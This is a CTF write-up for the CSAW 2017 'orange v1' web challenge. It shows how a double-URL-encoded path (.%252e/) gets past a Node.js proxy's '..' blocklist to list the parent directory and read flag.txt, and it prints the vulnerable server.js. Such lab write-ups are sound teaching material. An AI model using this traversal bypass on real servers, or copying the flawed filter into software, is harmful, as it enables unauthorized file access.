[CSAW CTF Qualification Round 2017] - orange v1 (Web 100)

Challenge description

I wrote a little proxy program in NodeJS for my poems folder.

Everyone wants to read flag.txt but I like it too much to share.

http://web.chal.csaw.io:7311/?path=orange.txt

Solution

First, try http://web.chal.csaw.io:7311/?path=

Directory listing for /poems/
burger.txt
haiku.txt
orange.txt
ppp.txt
the_red_wheelbarrow.txt

This lists every file in the poems directory.

Next, try http://web.chal.csaw.io:7311/?path=../

WHOA THATS BANNED!!!!

So ".." is clearly being filtered. I tried for a long time, even the full-width N (ＮＮ) trick, and finally found that a double URL encoded payload works (reference: OWASP Testing for Directory Traversal).

Double URL encoding: . => %2e => %252e

Why this works: the proxy's check runs on the query string after a single round of percent-decoding, so %252e reaches it as %2e and the value contains no "..". The proxy then forwards that still-encoded path to the backend on port 8080, which decodes it once more and sees "../".

Try http://web.chal.csaw.io:7311/?path=.%252e/

Directory listing for /poems/../
.dockerignore
back.py
flag.txt
poems/
serve.sh
server.js

Requesting http://web.chal.csaw.io:7311/?path=.%252e/flag.txt returns the flag.

Flag: flag{thank_you_based_orange_for_this_ctf_challenge}

Afterword

I also pulled out server.js for study, and it turns out it even blocks NN XDD
As expected of orange: he blocks the very trick he discovered himself XDD

var http = require('http');
var fs = require('fs');   // required but never used
var url = require('url');
var server = http.createServer(function(req, res) {
  try {
    // parseQueryString = true percent-decodes the query string exactly once,
    // so "%252e" arrives here as "%2e"
    var path = url.parse(req.url, true).query;
    path = path['path'];
    // blocklist check: ".." and "NN" (the full-width N trick mentioned above)
    if (path.indexOf("..") == -1 && path.indexOf("NN") == -1) {
      // the still-encoded path is appended to the base URL and forwarded
      // to the backend on port 8080, which decodes it again
      var base = "http://localhost:8080/poems/";
      var callback = function(response){
        var str = '';
        response.on('data', function (chunk) {
          str += chunk;
        });
        response.on('end', function () {
          res.end(str);
        });
      }
      http.get(base + path, callback).end();
    } else {
      res.writeHead(403);
      res.end("WHOA THATS BANNED!!!!");
    }
  }
  catch (e) {
    res.writeHead(404);
    res.end('Oops');
  }
});
server.listen(9999);

Notes

While solving this I found a useful tool and wordlist:
Wfuzz - The Web fuzzer official site
Wfuzz Github
Wfuzz wordlist
In the end I tried the entries from wordlist/vulns/cgis.txt and finally solved it~
I was quite moved QwQ